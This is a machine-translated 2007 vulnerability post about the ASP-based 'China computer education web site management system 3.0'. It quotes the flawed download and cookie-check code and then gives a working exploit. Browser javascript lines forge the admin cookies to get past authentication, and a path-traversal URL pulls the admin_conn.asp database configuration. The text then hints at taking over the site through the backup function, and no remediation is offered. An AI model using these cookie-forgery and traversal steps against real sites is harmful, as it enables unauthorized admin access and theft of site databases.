China computer education web site management system 3. 0 vulnerability analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62200717681
Type myhack58
Reporter 佚名
Modified 2007-11-21T00:00:00


In the/edit/downfile. asp has the following code:

Copy code

> <!--# include file="fsoconfig. asp" - > <!--# include file="checklogin. asp" - > <% call downloadFile(Request("path")) function downloadFile(strFile) strFilename = server. MapPath(strFile) Response. Buffer = True Response. Clear Set s = Server. CreateObject("ADODB. Stream") s. Open s. Type = 1 on error resume next Set fso = Server. CreateObject("Scripting. FileSystemObject") if not fso. FileExists(strFilename) then Response. Write("<h1>Error:</h1>" & strFilename & " does not exist<p>") Response. End end if Set f = fso. GetFile(strFilename) intFilelength = f. size s. LoadFromFile(strFilename) if err then Response. Write("<h1>Error: </h1>" & err. Description & "<p>") Response. End end if Response. AddHeader "Content-Disposition", "attachment; filename=" & amp; f. name Response. AddHeader "Content-Length", intFilelength Response. CharSet = "UTF-8" Response. ContentType = "application/octet-stream" Response. BinaryWrite s. Read Response. Flush s. Close Set s = Nothing End Function %>

The effect is to define a downloadfile function to download the file. Wherein the checklogin. asp is used to check whether the user login page. View his source code,has the following code

Copy code

> <% 'cookie authentication if Request. Cookies("admindj")<>"1" then Response. Write "<BR><BR><BR><BR><center>insufficient permissions, you do not have this feature administrative privileges" Response. end end if

if Request. Cookies("adminuser")="" or Request. Cookie("adminpass")="" then Response. Write "<BR><BR><BR><BR><center>insufficient permissions, you do not have this feature administrative privileges." Response. end end if %>

cookies verify whether the login,in the browser sequentially input

Copy code

> javascript:alert(document. cookie="admindj=1") javascript:alert(document. cookie="adminuser=hackwolf") javascript:alert(document. cookie="adminpass=fuckyou")

And then directly construct the URL:

Copy code

> http://localhost:81/edit/downfile.asp?path=../admin_conn.asp

Smooth download admin_conn. asp page,happy Download the database,the login page is:login. asp,login The background has a Backup Database function,we know how to do it.

整 站 下载 地址 :